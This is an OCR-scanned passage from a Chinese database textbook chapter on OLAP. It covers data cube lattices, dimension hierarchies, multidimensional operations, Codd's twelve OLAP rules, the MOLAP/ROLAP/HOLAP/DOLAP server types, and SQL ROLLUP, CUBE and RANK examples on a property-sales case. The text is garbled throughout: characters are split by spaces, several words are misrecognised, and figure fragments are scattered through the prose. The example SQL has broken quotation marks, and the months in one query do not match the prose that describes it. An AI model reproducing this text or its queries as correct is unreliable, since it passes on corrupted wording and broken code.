域 。 例 如 ，2D 的 立方 体 ， 即 | ( location( 按 市 算 )，time( 按 季度 算 ))| 立方体 显示 为 
33-1a 和 b。3D 的 立方 体 ， 即 | type，location( 按 市 算 )，time ( 按 季 度 算 )| 立方 体 显 示 
为 图 33-1c 和 d。4D 的 立方 体 ， 即 | type，location ( 按 市 算 )，time ( 按 季 度 算 )，office | 立 
方 体 显示 为 图 33-2。 

注意 ， 显 示 在 图 33-3 中 的 立方 体 的 格 并 不 表示 通常 与 维 关联 的 层次 结构 。 维 层次 将 在 
下 一 节 中 讨论 。 
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0-D 维 立方 体 ( 最 高 层 ) 


1D 维 立方 体 


Em 
2D 
-7 


3D 维 立方 体 


4D 维 立方 体 ( 最 低层 ) = 





图 33-3 具有 时 间 (季度 )、 地 点 (市 )、 房 屋 类 型 (类 型 ) 和 分 店 (分 公司 ) 四 个 维度 的 房 
产销 售 收入 数据 表示 为 立方 体 的 格 


33.3.2” 维 层次 


维 层次 结构 定义 了 从 一 组 较 低 级 别 的 概念 到 较 高 级 别 概念 的 上 映射。 例如， 对 于 销售 收入 
数据 ， 所 在 地 (location) 维度 的 最 低级 别 为 邮政 单位 (zipCode) 级 ， 它 映射 到 (城市 的 ) 区 
(area)， 区 映射 到 市 (city)， 市 又 映射 到 (国家 的 ) 地 区 (region)， 在 最 高 级 别 地 区 映射 到 国 
家 。 所 在 地 维 的 层次 结构 { 邮政 单位 一 区 一 市 一 地 区 一 国家 } 如 图 33-4a 所 示 。 维 层次 不 需 
要 遵循 单个 序列 ， 可 以 存在 可 蔡 代 上 映射 ， 例 如 时 间 维 的 层次 结构 如 图 33-4b 所 示 ， 可 为 { 天 
一 月 一 季度 一 年 } 或 { 天 一 星期 一 季节 一 年 }。 在 图 33-la 和 的 二 维 数据 举例 中 用 到 的 所 
在 地 ( 按 市 算 ) 和 时 间 ( 按 季度 算 ) 级 在 图 33-4 中 用 深 色 阴影 标 出 并 用 虚线 连接 。 


33.3.3 ”多 维 操作 


可 以 在 数据 立方 体 执行 的 分 析 操 作 包括 上 卷 、 下 销 、“ 切 片 和 切 块 ” 以 及 旋转 操作 。 

。 上 卷 。 上 卷 操作 用 两 种 方式 对 数据 执行 聚合 ， 或 通过 在 维 层 次 结构 上 向 上 移动 ( 例 
如 邮政 单位 到 区 、 区 到 市 )， 或 通过 维 归结 ,例如 把 四 维 销售 数据 (具有 所 在 地 、 时 
间 、 类 型 和 分 店 维 ) 视 为 三 维 销售 数据 (具有 所 在 地 、 时 间 和 类 型 维 )。 

。 下 外 。 下 钻 操作 是 上 卷 操作 的 逆 操 作 ， 并 涉及 显示 形成 聚合 数据 的 详细 数据 。 可 以 
通过 在 维 层 次 结构 上 向 下 移动 (例如 市 到 区 、 区 到 邮政 单位 ) 执行 下 钻 ， 或 通过 维度 
引入 执行 下 钻 ， 例 如 把 三 维 销售 数据 (具有 所 在 地 、 时 间 和 类 型 维 ) 看 作 四 维 销售 数 
据 (具有 所 在 地 、 时 间 、 类 型 和 分 部 维 )。 

e 切片 和 切 块 。 切 片 和 切 块 操作 是 指 从 不 同 角度 查看 数据 的 能 力 。 切 片 操作 执行 对 一 
个 维 的 数据 的 选择 。 例 如 ， 用 销售 收入 数据 的 一 个 切片 可 以 显示 类 型 为 “公寓 ”的 
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所 有 房产 的 销售 收入 。 切 块 操作 在 两 个 或 更 多 维 上 执行 选择 。 例 如 ， 用 销售 收入 数 
据 的 一 个 切 块 可 能 显示 类 型 为 “公寓 ”、 时 间 为 第 一 季度 (Q1 ) 的 所 有 销售 收入 情况 。 
e 旋转 。 旋 转 操作 能 旋转 行列 数据 ， 调 换 一 个 视角 看 相同 的 数据 。 例 如 ， 使 用 所 在 地 
(市 ) 作为 x 轴 、 时 间 (季度 ) 作为 y 轴 显示 的 销售 收入 数据 可 以 旋转 为 时 间 (季度 ) 


作为 x 轴 、 所 在 地 (市 ) 作为 y 轴 。 
国家 


. 
| 


邮政 单位 
a) 


A 


图 33-4 地 点 (a) 和 时 间 (b) 维 层次 的 例 。 虚 线 指出 在 图 33-1a 和 的 二 维 数据 举例 中 用 


到 的 地 点 和 时 间 维 层次 中 的 层 
33.3.4 “多维 模式 


多 维 数据 最 流行 的 数据 模型 是 星 形 模 式 ( star schema)， 其 特征 是 事实 (测量 ) 在 中 
间 ， 维 度 包 围 在 旁边 ， 形 成 星 形 状 。 星 形 模式 的 变形 包括 雪花 ( snowflake) 模式 和 星座 
(starflake) 模式 ， 这 些 模式 在 32.4 节 中 有 详细 描述 。 另 外 ， 使 用 工作 示例 开发 星 形 模式 的 过 


程 在 32.5 节 也 已 给 出 。 


33.4 OLAP 工具 


市 场 上 已 有 各 种 各 样 的 OLAP 工具 可 用 。 但 
选择 时 多 有 混乱 ,我 们 时常 疑 虑 OLAP 工具 对 潜 
在 买主 到 底 意味 什么 ， 以 及 具体 什么 样 的 体系 结 
构 适合 于 OLAP 工具 。 本 节 首 先 介绍 OLAP 工具 
的 通用 准则 ， 并 不 涉及 一 个 特定 的 结构 ， 然 后 讨 
论 现 有 的 每 一 主要 类 别 商用 OLAP 工具 的 重要 特 
点 、 体 系 结构 和 相关 问题 。 


33.4.1 OLAP 工具 的 Codd 准则 


1993 年 ，E. F. Codd 构想 出 12 条 准则 作为 选 
择 OLAP 工具 的 基础 。 这 些 准则 的 公布 是 为 Arbor 
Software ( Essbase 的 创建 者 ) 研究 的 结果 ， 并 且 
导致 对 OLAP 工具 的 需求 进行 形式 化 的 重新 定义 。 


表 33-2 关于 OLAP 工具 的 Codd 准则 
1. 多 维 概念 视图 


2. 透明 性 
3. 可 访问 性 
4. 一 致 的 报告 性 能 


5. 客户 - 服务 器 体系 结构 


6. 维度 一 般 性 


7. 动态 稀 疏 矩阵 处 理 


8. 多 用 户 支 持 


9. 不 受 限制 的 跨 维 操作 


10. 直观 数据 操作 


11. 灵活 的 报表 功能 
12. 无 限制 的 维 与 聚集 层次 
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Codd 准则 在 表 33-2 中 列 出 (Codd 等 人 ，1993 )。 

(1) 多 维 概念 视图 OLAP 工具 应 该 能 够 为 用 户 提 供 对 应 企业 用 户 视 图 的 多 维 模 型 ， 
并 且 该 模型 直观 应 该 是 可 分 析 且 易于 使 用 的 。 有 意思 的 是 ,不 同 的 OLAP 工具 供应 商 给 这 
个 准则 提供 了 不 同 层 次 的 支持 ， 他 们 甚至 声称 数据 的 多 维 概念 视图 没有 多 维 存储 也 能 表示 
出 来 。 

( 2 ) 透明 性 OLAP 技术 、 基 础 的 数据 库 及 体系 结构 、 输 入 数据 源 可 能 的 异 构 性 都 应 对 
用 户 透明 。 这 样 才 能 让 用 户 继续 使 用 熟悉 的 前 端 环 境 和 工具 ， 保 证 用 户 的 生产 力 。 

( 3 ) 可 访问 性 ”OLAP 工具 应 该 能 从 所 有 异 构 的 数据 源 中 访问 分 析 所 需 数 据 ， 不 管 是 关 
系 型 的 、 非 关系 型 的 还 是 遗留 系统 。 

( 4 ) 一 致 的 报告 性 能 ” 当 维 的 数目 、 到 集 的 层次 以 及 数据 库 大 小 增加 时 ， 用 户 不 应 该 感 
觉 到 任何 性 能 上 的 下 降 。 对 于 关键 值 的 计算 方法 也 不 应 该 有 什么 变化 。 系 统 模型 应 该 健壮 到 
足以 应 付 企 业 模型 的 变化 。 

( 5 ) 客户 -服务 器 体系 结构 ”OLAP 系统 在 客户 - 服务 器 环境 下 也 应 该 能 有 效 运转 。 这 
种 体系 结构 应 该 能 够 提供 优化 的 性 能 、 灵 活性 、 适 应 性 、 可 伸缩 性 和 互 操作 性 。 

( 6 ) 维度 一 般 性 ”每 一 个 数据 维 不 管 是 在 结构 上 还 是 在 操作 能 力 上 都 必须 等 同 。 换 句 话 
说 ， 基 本 结构 、 公 式 和 报表 都 不 应 该 偏向 任何 一 维 。 

(7 ) 动态 稀 朴 矩阵 处 理 OLAP 系统 应 该 能 够 根据 特定 的 分 析 模 型 调整 其 物理 模式 ， 优 
化 稀 朴 矩阵 处 理 以 保证 和 维持 所 要 求 的 性 能 级 。 一 般 来 说 ， 通 常 的 多 维 模型 含有 上 百 万 个 单 
元 格 ， 而 在 某 一 时 刻 并 非 所 有 单元 格 都 有 合适 的 数据 。 这 些 空 值 应 该 以 某 种 有 效 但 对 数据 访 
问 的 速度 与 精度 不 产生 负面 影响 的 方式 存储 。 

( 8 ) 多 用 户 支 持 ”OLAP 系统 应 该 能 支持 一 组 用 户 并 发 访问 企业 数据 的 同一 或 不 同 模型 。 

( 9 ) 不 受 限制 的 跨 维 操作 ”OLAP 系统 必须 能 识别 维 层次 结构 ， 并 且 在 维 内 或 跨 维 自动 
执行 相关 的 上 卷 计算 。 

( 10 ) 直观 的 数据 操作 切片 与 切 块 (旋转 )、 下 钻 、 合 并 (上 卷 ) 及 其 他 操作 应 该 能 够 
在 立方 体 的 单元 格 上 通过 直接 的 “点 选 式 ” 或 “ 拖 放 式 ”动作 来 完成 。 

( 11 ) 灵活 的 报表 功能 “必须 能 合理 安排 行 、 列 和 单元 格 的 表现 样式 ， 通 过 更 直观 可 视 
的 分 析 报 表 来 简化 分 析 。 用 户 应 该 能 检索 他 们 所 需 的 任何 数据 视图 。 

( 12 ) 无 限制 的 维 与 聚集 层次 ”基于 业务 需要 ， 分 析 模 型 可 能 要 有 多 个 维 ， 每 一 维 包 含 
多 个 层次 。OLAP 系统 不 应 该 在 维 的 数量 上 或 聚集 层次 上 有 任何 人 为 限制 。 

自从 发 布 了 关于 OLAP 的 Codd 准则 以 来 ， 出 现 了 许多 提议 ， 要 重新 定义 和 扩展 这 些 准 
则 。 例 如 ， 某 些 提 议 说 : 除了 这 12 条 准则 ， 商 用 的 OLAP 工具 还 应 当 包 括 综合 的 数据 库 管 
理工 具 ， 还 要 有 下 钻 到 细节 数据 ( 源 记录 层 ) 的 能 力 ， 增 量 式 数据 库 刷 新 以 及 与 现 有 企业 环 
境 的 SQL 接口 。 有 关 OLAP 的 准则 /特性 的 另外 的 讨论 ， 感 兴趣 的 读者 可 参见 描述 FASMI 
测试 的 OLAP Report，FASMI 代表 在 www.olapreport.com 上 可 用 的 共享 多 维 信息 的 快速 分 
析 (the Fast Analysis of Shared Multidimensional Information ) 。 


33.4.2 ”OLAP 服务 器 一 一 实现 问题 


保存 在 数据 仓库 中 的 多 维 数据 可 能 是 巨 量 的 ， 因 此 ， 要 使 OLAP 服务 器 能 够 快速 有 效 
地 响应 查询 ， 需 要 服务 器 访问 那些 预先 计算 的 详细 数据 的 立方 体 。 然 而 ， 基 于 详细 的 仓库 数 
据 生 成 所 有 可 能 的 立方 体 可 能 需要 过 多 的 存储 空间 一 一 特别 是 对 于 具有 大 量 维度 的 数据 。 一 
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种 解决 方案 是 仅 创建 所 有 可 能 的 立方 体 的 一 个 子 集 ， 目 的 是 支持 查询 中 的 大 多 数 和 /或 最 耗 
资源 的 那些 。 立 方 体 的 创建 被 称 为 立方 体 物化 (cube materialization ) 。 

减少 立方 体 所 需 空间 的 另 一 解决 方案 是 用 压缩 的 形式 存储 预计 算数 据 。 这 是 通过 动态 选 
择 物理 存储 组 织 和 压缩 技术 来 实现 最 大 化 的 空间 利用 率 。 笛 密 数 据 ( 即 ， 立 方 体 单元 中 存在 
数据 的 百分比 高 ) 可 以 与 稀 朴 数据 ( 即 ， 立 方 体 单元 为 空 的 百分比 高 ) 分 开 存 储 。 例 如 ， 某 
些 分 店 可 能 只 卖 特定 类 型 的 房产 ， 因 此 一 个 分 店 相 关 的 房产 类 型 百分比 的 单元 格 可 能 是 空 
的 ， 从 而 导致 立方 体 稀 朴 。 另 一 种 稀 朴 数据 是 当 许多 立方 体 单元 格 包含 重复 数据 时 创建 。 例 
如 ， 当 在 英国 的 每 个 主要 城市 都 有 大 量 的 分 店 时 ， 保 存 city 值 的 立方 体 单 元 将 重复 多 次 。 
OLAP 服务 器 省 略 空 或 重复 的 单元 格 的 能 力 可 以 大 大 减少 数据 立方 体 的 大 小 和 处 理工 作 量 。 

通过 优化 空间 利用 率 ，OLAP 服务 器 可 以 最 小 化 物理 存储 要 求 ， 从 而 使 得 有 可 能 分 析 更 
加 大 量 的 数据 。 它 还 使 得 可 以 将 更 多 的 数据 加 载 到 计算 机 内 存 ， 这 样 通过 减少 磁盘 IO 显著 
提高 了 性 能 。 

总 之 ， 预 聚合 、 维 度 层次 和 稀 玖 数据 管理 可 以 显著 减少 OLAP 数据 库 的 大 小 和 计算 值 
的 需要 。 这 样 的 设计 消除 了 对 多 个 连接 的 需要 并 且 提 供 对 所 需 数据 快速 且 直 接地 访问 ， 从 而 
显著 加 速 了 多 维 查询 的 执行 。 


33.4.3 OLAP 服务 器 的 种 类 


OLAP 服务 器 根据 用 于 存储 和 处 理 多 维 数据 的 体系 结构 进行 分 类 。 主 要 有 以 下 四 种 类 型 
的 OLAP 服务 器 (Berson and Smith ，1997 ): 

e 多 维 OLAP (MOLAP)。 

e@ 关系 型 OLAP (ROLAP)。 

e 混合 OLAP (HOLAP)。 

e 桌面 OLAP (DOLAP)。 

多 维 OLAP (MOLAP) 

MOLAP 服务 器 使 用 专门 的 数据 结构 和 多 维 数据 库 管理 系统 ( MDDBMS) 来 组 织 、 导 航 
和 分 析 数 据 。 为 了 提高 查询 性 能 ， 数 据 最 好 按 预计 的 用 途 进行 聚集 和 存储 。MOLAP 数据 结 
构 使 用 了 数组 技术 和 有 效 的 存储 技术 ， 这 种 存储 技术 通过 稀疏 数据 管理 使 磁盘 空间 需求 最 小 
化 。 当 数据 按 设计 意图 使 用 时 ， 即 专注 于 某 个 特定 决策 支持 应 用 时 ，MOLAP 服务 器 可 提供 
极 好 的 性 能 。 传 统 的 MOLAP 服务 器 需要 一 个 紧 耦 合 的 应 用 层 和 表示 层 ， 但 当前 的 趋势 是 通 
过 使 用 公开 的 应 用 程序 编程 接口 (API)， 使 OLAP 与 具体 的 数据 结构 分 离 。MOLAP 的 典型 
体系 结构 如 图 33-5 所 示 。 


外 关系 数据 库 服务 器 MOLAP 服 务 器 终端 用 户 访 问 工具 








图 33-5 MOLAP 的 体系 结构 
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与 MOLAP 开发 相关 的 问题 有 : 


se 只 有 有 限 数量 的 数据 能 被 有 效 地 存储 和 分 析 。 当 需要 支持 多 个 主体 域 和 需 访问 细节 
数据 时 ， 其 基本 数据 结构 局 限 了 这 种 能 力 。( 某 些 产品 通过 让 MOLAP 服务 器 访问 存 


储 在 关系 数据 库 中 的 细节 数据 来 解决 这 个 问题 。) 


e 由 于 数据 是 根据 以 前 确定 的 需求 设计 的 ， 因 此 导航 和 分 析 数 据 会 受到 限制 。 数 据 可 


能 需要 在 物理 上 重新 组 织 以 更 好 地 支持 新 的 需要 。 


e。 MOLAP 产品 需要 一 组 不 同 的 技能 和 工具 来 构建 和 维护 数据 库 ， 因 此 增加 了 支持 的 代价 


和 复杂 度 。 
关系 型 OLAP (ROLAP) 


ROLAP 是 发 展 得 最 快 的 一 类 OLAP 服务 器 。 之 所 以 发 展 这 么 快 ， 一 方面 是 为 了 满足 用 
户 分 析 数 量 持续 增长 的 数据 要 求 ， 另 一 方面 也 是 因为 认识 到 用 户 不 能 将 他 们 要 求 的 所 有 数据 
存 人 MOLAP 数据 库 。ROLAP 通过 使 用 元 数据 层 来 支持 关系 型 DBMS ， 这 样 就 不 必 再 创建 
静态 的 多 维 数据 结构 。 这 也 便于 创建 二 维 关系 的 多 个 多 维 视图 。 为 了 提高 性 能 ， 某 些 ROLAP 
服务 器 增加 了 SQL 引擎 以 支持 复杂 的 多 维 分 析 。 但 是 其 他 一 些 人 又 建议 或 要 求 使 用 像 星 形 模 
式 (参见 32.2 节 ) 这 类 高 度 不 规范 的 数据 库 设 计 。ROLAP 的 典型 体系 结构 如 图 33-6 所 示 。 


与 ROLAP 开发 相关 的 问题 有 
e 在 处 理 复杂 查询 时 ， 需 要 多 次 传送 关系 型 数据 ， 性 能 上 会 有 影响 。 


e 开发 中 间 件 来 简化 多 维 应 用 的 开发 ， 就 是 说 ， 开 发 一 个 专门 的 软件 将 二 维 关系 转换 





成 多 维 结构 。 
e 开发 一 个 创建 永久 多 维 结构 的 选项 ， 以 及 有 助 于 这 些 结构 管理 的 机 制 。 
咱 关 系数 据 库 服务 器 ROLAP 服 务 器 终端 用 户 访 问 工具 
| SQL 数据 请 求 加 
二 一 一 一 一 二 -一 一 一 一 一 一 -一 
| 一 四 





图 33-6 ”ROLAP 的 体系 结构 


混合 OLAP (HOLAP) 


HOLAP 提供 受 限 的 分 析 能 力 ， 分 析 或 直接 针对 关系 型 DMBS 产品 ， 或 通过 使 用 一 个 
MOLAP 服务 器 。HOLAP 服务 器 直接 提交 从 DMBS 选择 的 数据 ， 或 者 通过 一 个 MOLAP 服 
务 器 ， 以 数据 立方 体 的 方式 呈现 给 前 端 (或 本 地 服务 器 )， 数 据 在 那里 存储 、 分 析 和 维护 。 
供应 商 声 称 这 种 技术 的 安装 和 管理 都 相对 简单 ， 能 减少 费用 和 维护 工作 。 通 常 HOLAP 服务 


器 的 体系 结构 如 图 33-7 所 示 。 
与 HOLAP 开发 相关 的 问题 有 : 


e 这 种 体系 结构 可 能 导致 很 大 的 数据 元 余 ， 对 于 要 支持 许多 用 户 的 网 络 可 能 会 产生 问题 。 


e 由 于 允许 用 户 定 制 数据 立方 体 ， 可 能 会 导致 用 户 间 缺乏 数据 一 致 性 。 
。 仅 有 限量 的 数据 能 够 被 高 效 地 维护 。 





图 33-7 HOLAP 服务 器 的 体系 结构 


桌面 OLAP (DOLAP ) 
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终端 用 户 访问 工具 


| 


近 几 年 逐渐 流行 的 OLAP 服务 器 是 DOLAP。DOLAP 工具 以 基于 客户 的 文件 存储 数据 ， 
采用 客户 多 维 引擎 支持 多 维 数据 处 理 。DOLAP 只 要 求 抽取 较 少 量 数据 存储 在 客户 端 。 数 据 
可 以 预先 或 按 需 分 发 (可 能 通过 Web)。 当 有 多 维 数据 库 在 服务 器 上 ，OLAP 数据 可 保存 在 
磁盘 或 者 内 存 中 ， 然 而 ， 一 些 DOLAP 工具 只 支持 读 操作 。 大 多 数 DOLAP 开发 商 利 用 桌面 


PC 的 能 力 来 执行 一 些 (如 果 不 是 大 多 数 的 话 ) 多 维 计算 。 


DOLAP 数据 库 的 管理 一 般 通 过 一 个 中 央 服 务 器 或 处 理 流 程 进行 ， 它 负责 为 每 个 用 户 准备 
数据 立方 体 或 数据 集 。 只 要 基本 的 处 理 完成 ， 用 户 就 可 以 访问 自己 那 部 分 数据 。 通 常 DOLAP 


的 体系 结构 如 图 33-8 所 示 。 


关系 数据 库 
服务 器 


站 





来 自 关系 数据 库 或 
， MOLAP 服 务 器 的 OLAP 
再 数据 ， 通 过 e-mail、Web 
或 传统 的 客户 服务 器 结构 
部 署 到 台式 机 和 笔记 本 上 












































图 33-8 DOLAP 的 体系 结构 


与 DOLAP 开发 相关 的 问题 有 : 


DOLAP 











。 提供 合适 的 安全 控制 以 支持 DOLAP 环境 的 各 个 部 分 。 由 于 数据 要 从 系统 中 物理 地 提 
取出 来 ， 保 密 通常 是 靠 限制 可 编 入 每 个 立方 体 的 数据 来 实现 。 一 旦 立方 体 加 载 到 用 
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户 桌面 ， 相 关 的 元 数据 就 被 本 地 用 户 所 有 。 

e 减少 配置 和 维护 DOLAP 工具 的 开销 。 某 些 DOLAP 开发 商 提供 了 一 系列 可 选 的 方法 
来 配置 OLAP 数据 ， 例 如 通过 e-mail、Web 或 者 使 用 传统 的 客户 服务 器 结构 。 

e 当前 的 趋势 是 朝 着 “ 瘦 ” 客 户 机 发 展 。 


33.5 SQL 的 OLAP 扩展 


在 第 6 章 和 第 7 章 中 讨论 了 SQL 的 优点 ， 包 括 易学 、 非 过 程 化 、 无 格式 、 独 立 于 
DBMS， 并 且 作 为 标准 被 国际 广泛 接受 。 然 后 ，SQL 用 于 业务 分 析 时 主要 的 限制 在 于 它 难 以 
例 行 地 回答 一 些 业务 查询 问题 ， 比 如 ， 计 算 这 个 月 与 一 年 前 的 百分比 变化 ， 计 算 移 动 平 均 
值 ,或 者 累积 求 和 及 其 他 统计 功能 。 为 了 弥补 这 些 不 足 ，ANSI 选取 了 一 组 OLAP 功能 作为 对 
SQL 的 扩充 ,使 得 SQL 可 以 完成 上 述 计算 以 及 一 些 过 去 不 现实 甚至 不 可 能 完成 的 计算 。IBM 
和 Oracle 联合 起 来 早 在 1999 年 就 提出 了 这 些 扩展 , 但 它们 在 SQL:2003 中 才 第 一 次 公布 ,在 
SQL:2008 以 及 最 新 版 本 SQL:2011 中 进行 了 增强 。 

这 些 扩 展 集结 为 “OLAP 包 ”， 包 含 了 SQL 语言 的 如 下 特征 ， 分 别 在 ISO/ITEC9075-2 
(ISO，2011a) 各 部 分 的 SQL 特征 分 类 附录 (the SQL Feature Taxonomy Annex) 中 给 出 : 

e 特征 T431,“ 扩 展 的 分 组 能 力 ”。 

e 特征 T611,“ 扩 展 的 OLAP 操作 符 ”。 

本 节 首 先 通过 展示 两 个 分 别称 为 ROLLUP 和 CUBE 的 函数 的 例子 ,讨论 OLAP 包 的 扩 
展 分 组 能 力 。 然 后 通过 展示 两 个 分 别称 为 移动 加 窗 聚 集 和 排队 的 函数 的 举例 ， 说 明 OLAP 
包 扩 展 的 OLAP 操作 符 。 为 了 方便 地 说 明 这 些 OLAP 函数 的 用 途 ， 有 必要 对 DreamHome 案 
例 研 究 也 做 扩展 。 

对 当前 SQL 标准 的 OLAP 包 的 详情 感 兴趣 的 读者 可 参考 ANSI 的 网 站 www.ansi.org。 


33.5.1 扩展 的 分 组 能 力 


聚合 是 OLAP 的 基础 。 为 了 增强 聚合 能 力 ，SQL 标准 对 GROUP BY 子 句 进行 扩展 ， 比 
如 增加 了 ROLLUP 和 CUBE 函数 。 

ROLLUP 支持 应 用 SUM、COUNT、MAX、MIN 和 AVG 等 聚合 向 更 高 层 进行 聚集 计算 ， 
可 以 从 最 细节 层 一 直到 最 顶层 。CUBE 类 似 于 ROLLUP， 仅 使 用 单个 语句 就 可 以 计算 所 有 可 
能 的 聚集 组 合 。CUBE 还 可 以 使 用 单个 查询 产生 交叉 表 报 表 中 需要 的 信息 。 

ROLLUP 和 CUBE 扩展 均 在 GROUP BY 语句 中 明确 指明 了 分 组 的 需求 ， 产 生 的 结果 相当 
于 不 同 分 组 行 的 UNION ALL。 接 下 来 的 部 分 将 更 详细 地 描述 ROLLUP 和 CUBE 分 组 功能 。 

对 GROUP BY 的 ROLLUP 扩展 

ROLLUP 使 得 SELECT 语句 可 以 路 一 组 指定 的 维 计算 多 个 级 别 上 的 子 和 。SELECT 语 
句 中 使 用 ROLLUP 的 语法 格式 如 下 : 


SELECT ... GROUP BY ROLLUP(columnList) 


ROLLUP 沿 着 在 ROLLUP 子 句 中 指定 的 一 组 列 ， 从 最 细节 的 数据 向 上 聚合 。 它 首先 计 
算 GROUP BY 子 句 中 指定 的 标准 聚合 值 ， 然 后 不 断 向 更 高 层 求 子 和 ， 直 至 遍历 指定 的 所 有 
列 ， 得 到 所 需要 的 总 和 。 

如 果 分 组 列 的 数量 为 nx，ROLLUP 则 在 n+1 级 上 计算 子 和 。 例 如 ， 如 果 一 个 查询 指定 在 


省 33 音 OL4P 399 


分 组 列 propertyType 、yearMonth 和 city 上 (n=3 ) 进行 ROLLUP 操作 ， 和 那么 结果 集 将 包含 
在 4 个 聚合 层 的 行 。 
下 例 展示 ROLLUP 的 用 途 。 


| 例 33.1 3》 使 用 ROLLUP 分 组 功能 

显示 2013 年 9 月 和 10 月 地 处 Aberdeen、Edinburgh 和 Glasgow 的 分 店 销售 公寓 或 别墅 
的 总 量 。 

在 这 个 例子 中 ， 我 们 首先 需要 识别 Aberdeen 、Edinburgh 和 Glasgow 的 分 店 ， 然 后 分 别 
聚合 2013 年 9 月 和 10 月 这 些 城市 中 所 有 分 店 销售 公寓 和 别墅 的 总 合 。 

为 了 回答 这 个 查询 ， 我 们 需要 在 DreamHome 案例 中 增加 一 个 表 PropertySale， 里 面包 
含 四 个 属性 ， 分 别 是 branchNo、propertyNo、yearMonth 和 saleAmount。 这 个 表 给 出 每 个 分 
店 各 种 房产 的 销售 情况 。 同 时 ， 该 查询 还 需要 访问 Branch 和 PropertyForSale 两 个 表 ， 参见 
图 4-3。 要 注意 的 是 表 Branch 和 PropertyForSale 都 包含 列 city。 为 了 简化 操作 ， 我 们 将 表 
PropertyForSale 中 的 city 列 改 名 为 pcity。ROLLUP 功能 的 查询 格式 为 : 

SELECT propertyType, yearMonth, city, SUM(saleAmount) AS sales 

FROM Branch, PropertyForSale, PropertySale 

WHERE Branch.branchNo = PropertySale.branchNo 

AND PropertyForSale.propertyNo = PropertySale.propertyNo 

AND PropertySale.yearMonth IN (‘2013-08’, ‘2013-09’) 


AND Branch.city IN (Aberdeen’, ‘Edinburgh’, ‘Glasgow’) 
GROUP BY ROLLUP(propertyType, yearMonth, city); 


该 查询 的 结果 如 表 33-3 所 示 。 要 注意 的 是 由 于 需要 多 轮 计算 ,返回 结果 并 不 总 是 累加 ， 
上 述 查 询 返 回 下 面 一 组 行 : 

e 常规 聚合 行 ， 它 们 由 GROUP BY 产生 ， 没 用 到 ROLLUP。 
第 一 级 子 和 聚合 ， 它 们 是 针对 propertyType 和 yearMonth 的 每 种 组 合 ， 跨 city 求 得 。 
第 二 级 子 和 聚合 ， 它 们 是 针对 propertyType 的 每 种 值 ， 汇 总 yearMonth 和 city。 
总 和 行 。 


表 33-3 例 33.1 的 结果 表 


DT Ti 
flat 2013-08 Edinburgh 236573 
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对 GROUP BY 操作 的 CUBE 扩展 
CUBE 针对 一 组 指定 的 列 ， 做 各 种 组 合 的 聚合 。SELECT 语句 中 使 用 CUBE 的 语法 格式 
如 下 : 


SELECT ... GROUP BY CUBE(columnList) 


在 多 维 分 析 中 ，CUBE 操作 根据 指定 的 维度 计算 各 种 子 和 。 例 如 ， 如 果 指 定 CUBE 
( propertyType，yearMonth，city)， 则 结果 集中 将 包含 一 个 等 价 的 ROLLUP 语句 的 所 有 结果 
值 以 及 一 些 额 外 的 组 合 。 例 如 ， 在 例 33.1 中 ，ROLLUP (propertyType, yearMonth, city) 
子 句 并 不 计算 对 于 各 类 房产 组 合 的 按 城市 的 统计 ,但 是 CUBE (propertyType，yearMonth ， 
city) 要 计算 。 如 果 在 CUBE 中 指定 了 个 列 ， 那么 就 有 2” 种 组 合 的 子 和 。 例 33.2 给 出 了 
一 个 三 维 cube。 

何 时 使 用 CUBE 

CUBE 可 以 用 在 需要 交叉 表 报 表 的 任何 情形 。 这 样 交 叉 表 报 表 所 需 数据 只 需 一 个 带 
CUBE 的 SELECT 语句 就 够 了 。 与 ROLLUP 一 样 ，CUBE 有 助 于 产生 汇总 表 。 

CUBE 通常 最 适合 用 在 列 来 自 多 个 维 的 查询 中 ， 而 不 是 列表 示 同 一 维 的 多 个 层次 的 情 
形 。 例 如 ， 通 常 要求 的 交叉 表 可 能 需要 propertyType、yearMonth 和 city 三 种 维度 所 有 组 合 
的 子 和 。 相 反 ， 显 示 year、month 和 day 所 有 组 合 的 交叉 表 中 只 有 几 个 值 有 意义 ， 因 为 在 
time 维度 上 本 身 就 存在 一 个 自然 层次 关系 。 下 例 展示 CUBE 函数 的 用 途 。 


| 例 33.2 》 使 用 CUBE 分 组 功能 
显示 2013 年 8 月 和 9 月 地 处 Aberdeen、Edinburgh 和 Glasgow 的 分 店 销售 房产 所 有 可 
能 的 子 和 。 


SELECT propertyType, yearMonth, city, SUM (saleAmount) AS sales 

FROM Branch, PropertyForSale, PropertySale 

WHERE Branch.branchNo = PropertySale.branchNo 

AND PropertyForSale.propertyNo = PropertySale.propertyNo 

AND PropertySale.yearMonth IN (‘2013-08’, ‘2013-09’) 

AND Branch.city IN (Aberdeen ‘Edinburgh’, ‘Glasgow’) 
GROUP BY CUBE(propertyType, yearMonth, city); 


结果 如 表 33-4 所 示 。 


免 33 童 OLAP 401 


表 33-4 例 33.2 的 结果 表 
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表 中 标 粗 体 的 行 是 ROLLUP ( 见 表 33-3 ) 和 CUBE 函数 返回 结果 共有 的 行 。 然 而 ，CUBE 
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(propertyType，yearMonth，city) 子 句 中 n=3， 将 产生 2=8 级 聚合 ， 而 在 例 33.1 中 ，ROLLUP 
(propertyType，yearMonth，city) 子 旬 中 n=3， 只 产生 了 3+1=4 级 聚合 。 《人 


33.5.2 ”基本 OLAP 操作 


SQL 标准 的 OLAP 包 中 的 Elementary OLAP 操作 符 支 持 各 种 各 样 的 操作 ， 比 如 排队 和 加 
窗 计算 。 排 队 包 含 累 计 分 布 、 百 分 比 排序 以 及 N-tiles。 加 窗 计 算 主 要 使 用 SUM、AVG、MIN 
和 COUNT 等 函数 计算 累加 和 移动 聚集 。 接 下 来 ， 本 节 将 更 详细 地 前述 排队 和 加 窗 计算 操作 。 

排队 函数 

排队 函数 主要 是 依据 一 组 度量 计算 一 条 记录 相 比 其 他 记录 在 一 个 数据 集中 的 排序 。 排 队 
函数 有 多 种 ， 包 含 RANK 和 DENSE_RANK。 它们 的 语法 如 下 : 

RANK( ) OVER (ORDER BY columnList) 

DENSE RANK( ) OVER (ORDER BY columnList) 

尽管 所 给 的 语法 不 完全 ,但 足以 说 明 这 些 函 数 的 功用 。RANK 和 DENSE_RANK 的 主 
要 差别 在 于 ， 当 排序 出 现 冲突 时 , DENSE_RANK 不 会 在 顺序 排队 的 序列 上 留 下 间隙。 例如 ， 
若 有 三 个 分 店 在 计算 房产 销售 总 合 时 均 为 第 二 ，DENSE_RANK 则 让 这 三 家 位 列 第 二 ， 接 下 
来 那 家 分 店名 列 第 三 。 但 RANK 虽然 也 让 这 三 家 位 列 第 二 ,但 接 下 来 那 家 分 店 将 名 列 第 五 。 
下 面 给 出 具体 的 示例 。 


